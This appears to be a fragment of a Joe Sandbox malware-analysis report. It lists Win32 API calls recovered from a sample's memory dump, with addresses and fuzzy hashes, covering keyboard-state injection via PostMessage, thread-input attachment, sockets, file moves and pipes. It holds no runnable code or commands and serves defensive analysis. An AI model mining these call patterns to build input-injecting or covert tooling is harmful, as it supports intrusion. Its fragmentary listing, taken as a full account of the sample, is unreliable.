                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                        • Opcode ID: cd46a5e1e09e05dba4f62c9d08b7416db3c208ebd56560fb91da08eb58edb582
                                                                                                                                        • Instruction ID: fa0a546afa6eb91129c334512fa3f368376924ae163a8c321f2dd9d70861dc54
                                                                                                                                        • Opcode Fuzzy Hash: cd46a5e1e09e05dba4f62c9d08b7416db3c208ebd56560fb91da08eb58edb582
                                                                                                                                        • Instruction Fuzzy Hash: 52912871D0022D9FDF14DFA4D891AEEB7B8FF49310F1085A9E919A7251EB709A44CF60
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 00BB2183
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00BB21B5
                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BB21DD
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB2213
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00BB224D
                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00BB225B
                                                                                                                                          • Part of subcall function 00B83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83A57
                                                                                                                                          • Part of subcall function 00B83A3D: GetCurrentThreadId.KERNEL32 ref: 00B83A5E
                                                                                                                                          • Part of subcall function 00B83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B825B3), ref: 00B83A65
                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BB22E3
                                                                                                                                          • Part of subcall function 00B8E97B: Sleep.KERNEL32 ref: 00B8E9F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                        • Opcode ID: 918f6b00afef0cdb211c4397264be3fc9fa3d8f5cf048392e852dd9729e4150f
                                                                                                                                        • Instruction ID: 7132c460351de74e2ebf864204e0ba786add49e382366aef683c062027059aa2
                                                                                                                                        • Opcode Fuzzy Hash: 918f6b00afef0cdb211c4397264be3fc9fa3d8f5cf048392e852dd9729e4150f
                                                                                                                                        • Instruction Fuzzy Hash: 64713F75A00215AFCB14DF68C885AFEBBF5EF48310F148499E916EB351DBB4ED418B90
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(01095658), ref: 00BB7F37
                                                                                                                                        • IsWindowEnabled.USER32(01095658), ref: 00BB7F43
                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00BB801E
                                                                                                                                        • SendMessageW.USER32(01095658,000000B0,?,?), ref: 00BB8051
                                                                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00BB8089
                                                                                                                                        • GetWindowLongW.USER32(01095658,000000EC), ref: 00BB80AB
                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BB80C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                        • Opcode ID: 99566d137adc217d2d7cb9614132a8851a2a5074ffdfbe432f160946426a0efc
                                                                                                                                        • Instruction ID: 43208d0af22e6128109564060f8e79bb26f0c2481bb265c5c502c8d2116b2052
                                                                                                                                        • Opcode Fuzzy Hash: 99566d137adc217d2d7cb9614132a8851a2a5074ffdfbe432f160946426a0efc
                                                                                                                                        • Instruction Fuzzy Hash: C071CF34648284AFEB21DF54C884FFABBF9EF49340F104499E946972A1CFB1A845CB54
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 00B8AEF9
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00B8AF0E
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00B8AF6F
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B8AF9D
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B8AFBC
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B8AFFD
                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B8B020
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 46cc57617b023fe1bb5bc3a554969cdffa1db121eaa25cb5e4e18fba460f7157
                                                                                                                                        • Instruction ID: 7af02a15a06813270208dd5c9d161e6f613280f0cc30c0b9ab3e9f4abb7980a8
                                                                                                                                        • Opcode Fuzzy Hash: 46cc57617b023fe1bb5bc3a554969cdffa1db121eaa25cb5e4e18fba460f7157
                                                                                                                                        • Instruction Fuzzy Hash: BD51F5A06043D13DFB36A2348C45FBABEE99B06304F0885CAE2D5858E2D7D8ACC4D751
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(00000000), ref: 00B8AD19
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00B8AD2E
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00B8AD8F
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B8ADBB
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B8ADD8
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B8AE17
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B8AE38
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 01c4be17ca21c04b2ee09e9d8887d956d1db1347316ce048c859382cfb033319
                                                                                                                                        • Instruction ID: 7ac852115f992338357cc1a59da90051fca53a25f0e9a5b088ff23441d38b1dc
                                                                                                                                        • Opcode Fuzzy Hash: 01c4be17ca21c04b2ee09e9d8887d956d1db1347316ce048c859382cfb033319
                                                                                                                                        • Instruction Fuzzy Hash: E85118A15047D53DFB33A334CC85B7ABED89B05301F0889DAE1D5968E2D794EC84D752
                                                                                                                                        APIs
                                                                                                                                        • GetConsoleCP.KERNEL32(00B63CD6,?,?,?,?,?,?,?,?,00B55BA3,?,?,00B63CD6,?,?), ref: 00B55470
                                                                                                                                        • __fassign.LIBCMT ref: 00B554EB
                                                                                                                                        • __fassign.LIBCMT ref: 00B55506
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00B63CD6,00000005,00000000,00000000), ref: 00B5552C
                                                                                                                                        • WriteFile.KERNEL32(?,00B63CD6,00000000,00B55BA3,00000000,?,?,?,?,?,?,?,?,?,00B55BA3,?), ref: 00B5554B
                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00B55BA3,00000000,?,?,?,?,?,?,?,?,?,00B55BA3,?), ref: 00B55584
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                        • Opcode ID: 81e49cc6df2f7ff7fcf2e7908c708d7f2a315791878c4a8f88de2d13dabc3078
                                                                                                                                        • Instruction ID: 16b35d20dda6acbc089778beeb5646e0a68cde8823118aa2f1ab0f55e4cf7ddd
                                                                                                                                        • Opcode Fuzzy Hash: 81e49cc6df2f7ff7fcf2e7908c708d7f2a315791878c4a8f88de2d13dabc3078
                                                                                                                                        • Instruction Fuzzy Hash: E751E6709006499FDB20CFA8D891BEEBBF9EF18302F14419AF955E7291E7309A45CB60
                                                                                                                                        APIs
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B42D4B
                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00B42D53
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B42DE1
                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00B42E0C
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00B42E61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                        • String ID: csm
                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                        • Opcode ID: 7ce856bb0006444a82e39bfb586611bb75b1de29b3af385c48c6c9fe581b4abc
                                                                                                                                        • Instruction ID: 46b22e596f7a2c1f58a5c623803d17cf90495c3ae790c1a4136f62e14b16015f
                                                                                                                                        • Opcode Fuzzy Hash: 7ce856bb0006444a82e39bfb586611bb75b1de29b3af385c48c6c9fe581b4abc
                                                                                                                                        • Instruction Fuzzy Hash: 64418134E00209ABCF10DF68C885A9EBBF5FF44324F5481A5F815AB352D7319B15EB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BA304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BA307A
                                                                                                                                          • Part of subcall function 00BA304E: _wcslen.LIBCMT ref: 00BA309B
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BA1112
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA1121
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA11C9
                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00BA11F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2675159561-0
                                                                                                                                        • Opcode ID: 949d3db717412f000f95ac1ad75cd1a985ee5bbf0726a1e57bccd8c27bf0b387
                                                                                                                                        • Instruction ID: 2f9ced3fde88cc2bbecc6ba4e914fae41d6bf5527383aa625a412583838a075f
                                                                                                                                        • Opcode Fuzzy Hash: 949d3db717412f000f95ac1ad75cd1a985ee5bbf0726a1e57bccd8c27bf0b387
                                                                                                                                        • Instruction Fuzzy Hash: 51412331204214AFDB10DF18CC84BAABBE9EF46324F148199FD09AB291CB70ED41CBE1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B8CF22,?), ref: 00B8DDFD
                                                                                                                                          • Part of subcall function 00B8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B8CF22,?), ref: 00B8DE16
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00B8CF45
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B8CF7F
                                                                                                                                        • _wcslen.LIBCMT ref: 00B8D005
                                                                                                                                        • _wcslen.LIBCMT ref: 00B8D01B
                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00B8D061
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                                        • Opcode ID: b207eb797c5c9d008c7b4ec14835baa0688bcb1323f43005e8cc96efd7236786
                                                                                                                                        • Instruction ID: 358cbfe6b74904e72b628cd0b7aa14a07e6b9e53ec82aa6a8d40574345fe56dd
                                                                                                                                        • Opcode Fuzzy Hash: b207eb797c5c9d008c7b4ec14835baa0688bcb1323f43005e8cc96efd7236786
                                                                                                                                        • Instruction Fuzzy Hash: C14103B19452185FDF12FFA4D981ADEB7F9EF18380F1000E6A609EB151EB74A749CB50
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00BB2E1C
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB2E4F
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB2E84
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00BB2EB6
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00BB2EE0
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB2EF1
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB2F0B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                        • Opcode ID: 05c61ef2f69f165421db9fb404e7b91f6d988f8cdc8955e9b582ac69afec88d8
                                                                                                                                        • Instruction ID: 4de2d228e95481f83371f14dd928b1d7c03ac9c070f1fe495ed757b9c5ec9ee6
                                                                                                                                        • Opcode Fuzzy Hash: 05c61ef2f69f165421db9fb404e7b91f6d988f8cdc8955e9b582ac69afec88d8
                                                                                                                                        • Instruction Fuzzy Hash: 1131FD30604290EFEB21CF59DC85FB53BE5EB9A720F1546A4F9018B2B2CBB1E841DB51
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B87769
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8778F
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00B87792
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00B877B0
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B877B9
                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00B877DE
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00B877EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: 6dbb8317c803b9824f549e560f95e56b9f93366e6ccc803a0dcd7e7a0a4f651c
                                                                                                                                        • Instruction ID: a90c96e990dd67ef2374f6f480685597e51b408c152b035105f8a322758b7231
                                                                                                                                        • Opcode Fuzzy Hash: 6dbb8317c803b9824f549e560f95e56b9f93366e6ccc803a0dcd7e7a0a4f651c
                                                                                                                                        • Instruction Fuzzy Hash: 6621A77A604219AFDF10EFA8CC88CBB77ECEB097687148165F915DB260DA70DD41C764
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B87842
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B87868
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00B8786B
                                                                                                                                        • SysAllocString.OLEAUT32 ref: 00B8788C
                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00B87895
                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00B878AF
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00B878BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: d2f6595df30e17c4946cea2f29bcd407423f7ee5c18e5dda1781010de788f3c1
                                                                                                                                        • Instruction ID: 585d9f16e57398832736c93e537e96a4a7218113583444daa0004098ecf40fac
                                                                                                                                        • Opcode Fuzzy Hash: d2f6595df30e17c4946cea2f29bcd407423f7ee5c18e5dda1781010de788f3c1
                                                                                                                                        • Instruction Fuzzy Hash: F4218E31608205AF9B10EBA9DC8CDAA77ECEB08364B208165B915CB2A1DE70DC41CB64
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00B904F2
                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B9052E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                        • String ID: nul
                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                        • Opcode ID: 7103abead16b1d541271a594f16f7ec8f9342eb786e922af3eb6fbb615f09062
                                                                                                                                        • Instruction ID: 5720e48db1df6fdb98f52726287ad4cb9dea1e876d2241d1edda3ef3014bca72
                                                                                                                                        • Opcode Fuzzy Hash: 7103abead16b1d541271a594f16f7ec8f9342eb786e922af3eb6fbb615f09062
                                                                                                                                        • Instruction Fuzzy Hash: DE2151755103059FDF20AF29D884A5A7BF4EF54764F614A79E8A1D72E0D770D940CF20
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00B905C6
                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B90601
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                        • String ID: nul
                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                        • Opcode ID: ff7dc2631049fe6c116ae066d7fc0f6692cc3f53b4bfce69c6894b1da1a51136
                                                                                                                                        • Instruction ID: f627330ae3a54eaaaf1f95668719e5e902cf6fee70056ced0b3c1899ec1faedd
                                                                                                                                        • Opcode Fuzzy Hash: ff7dc2631049fe6c116ae066d7fc0f6692cc3f53b4bfce69c6894b1da1a51136
                                                                                                                                        • Instruction Fuzzy Hash: 752153755103059FDF20AF699C44A5A7BE8FF95724F200B69F8A1E72E0DBB09960CB20
                                                                                                                                        APIs
